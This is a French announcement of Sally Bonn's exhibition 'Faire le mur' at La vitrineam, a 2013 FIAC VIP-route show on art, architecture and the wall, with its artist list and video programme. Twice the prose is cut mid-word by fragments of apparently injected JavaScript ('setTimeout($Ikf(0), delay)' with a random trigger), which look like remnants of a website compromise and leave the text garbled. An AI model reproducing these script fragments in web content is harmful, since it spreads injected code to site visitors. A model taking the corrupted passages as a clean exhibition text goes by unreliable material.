Carte blanche à Sally Bonn 11/10/2013 – 08/11/2013 Parcours VIP de la FIAC Pour sa cinquième expérience, La vitrineam explore une nouvelle facette des relations art et marques, en questionnant plus spécifiquement les rapports entre art et architecture, à travers une carte blanche au commissaire d’exposition Sally Bonn. Pourquoi le secteur de l’architecture ? Parce que l’Art en direct, agence de communication par l’art contemporain, est témoin depuis quelques années de collaborations de plus en plus nombreuses entre le secteur du foncier et le monde de l’art. Mécénat, valorisation du patrimoine immobilier, commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande d’oeuvres monumentales, organisation d’expositions ouvertes au grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and public …, les cabinets d’architectes, les entreprises du bâtiment et les foncières suivent de près la création contemporaine et lui apportent leur soutien. Sally Bonn invite dix artistes à explorer le rapport existant entre l’art et l’architecture, via la thématique du mur. Penser le mur autrement qu’une surface ou une construction. Voir le mur au delà de sa verticalité et de l’obstacle qu’il peut générer. Faire le mur … le dépasser… tel un sujet, un symbole, une pensée vers la créativité, un espace de liberté. L’exposition révèle ce que le mur induit communément dans nos pensées : la part architecturale de toute construction bâtie et délimitée dans un espace, et la part qui questionne la texture comme élément de décoration et réceptacle d’oeuvres. Faire le mur, c’est une manière de déjouer le construit. Faire le mur, c’est à la fois le fabriquer et le contourner, le mettre en oeuvre et prendre la fuite. Faire le mur est le motif permettant de réunir et de confronter l’action de l’architecte et le geste de l’artiste. Avec :
- Arthur Aillaud
- Joan Ayrton
- Leïla Brett
- Jean-Jacques Dumont
- Vincent Ganivet
- Anne-Valérie Gasc
- Élodie Huet
- Christian Jaccard
- Piotr Klemensiewicz
- Rero
Ces artistes réinventent le mur. Ils expérimentent la matière, déconstruisent les normes architecturales, repensent les paysages et la fonction du mur dans son essence brute. L’exposition « Faire le mur » est une étape du parcours VIP de la FIAC 2013. Projection de nuit: « Sortie de nuit », vidéos de jeunes diplômés des écoles d’art.
- Arthur Debert : Le jour se lève, 2012, facetime vidéo, 2 minutes.
- JiSun Lee, i : none et Lens : I : none, 2010, Animation, 1’10’’, Couleur (presque noir et blanc), Muet ; Lens, 2011, Vidéo. 1’05’’, Couleur, Sonore.
- Juliette Miséréré: Eating Houses 3/3, 2012, vidéo, 4’51’’, 16/9.
- Lucie Mercadal: La maison moite /das feuchte Haus / the moist housen, 2013, video, 5’51 », HD 1920p, son stereo.
- Maude Felbabel : Rattus, 2013,vidéo, 2min, HD.